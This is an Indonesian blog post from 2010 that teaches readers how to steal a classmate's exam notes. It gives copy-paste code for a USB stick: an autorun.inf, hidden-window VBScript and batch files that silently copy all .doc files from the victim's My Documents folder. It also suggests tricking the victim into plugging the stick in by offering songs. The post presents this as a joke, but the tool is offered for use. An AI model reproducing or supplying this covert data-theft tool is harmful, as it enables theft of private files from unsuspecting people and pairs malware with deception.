Thursday, 14 October 2010

Hal yang Tidak Patut, namun Perlu Dicoba..heheee...

Ini hanya sekedar info bagi anda..tolong disimak baik dan kalau perlu dicoba kalo lagi kepepet....heheheee..
Bila anda sedang menghadapi ujian terakhir, dan anda belum siap, tetapi teman anda punya jawaban atau catatan penting di laptop atau di komputernya tapi tidak mau berbagi dengan anda, dan teman anda ini sedikit goblok, dan anda kepengen mencuri isi dokumen yang berada dikomputernya.

Caranya dengan membawa flashdisk, dan sembunyi2 masuk ke kamarnya dan mengcopy isi dokumen di harddisknya atau alternatif lain, atau bilang ajah gini, “Teman, aku punya lagu baru ini di flashdisk gue? mau copy ngga?” nah lalu kita copykan lagu nya ke komputer dia. (Ojo Ditiru...heheee..info wae yo..)
Langsung ajah...ikuti langkah2 berikut:
Sebelumnya siapin dulu flashdisk kita...sip..sip..

Langkah ke-1

Buka Notepad (saya sarankan pake program Notepad++) copy dan paste kode dibawah ini.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf

Langkah ke-2

Buka Notepad lagi dan copas kode berikut:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls
Simpan di flashdisk anda dengan nama:file.bat

Langkah ke-3

Buka Notepad lagi dan copas kode berikut:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Simpan di flashdisk anda dengan nama:invisible.vbs

Langkah ke-4

Buka Notepad lagi dan copas lagi kode berikut:
wscript.exe \invisible.vbs file.bat
Simpan di flashdisk anda dengan nama:launch.bat
Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”, akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.


Selamat mencoba dan semoga bermanfaat kalau lagi kepepet...coba dikomputer kamu dulu ya...heheee...


Reaksi:

0 komentar:

Post a Comment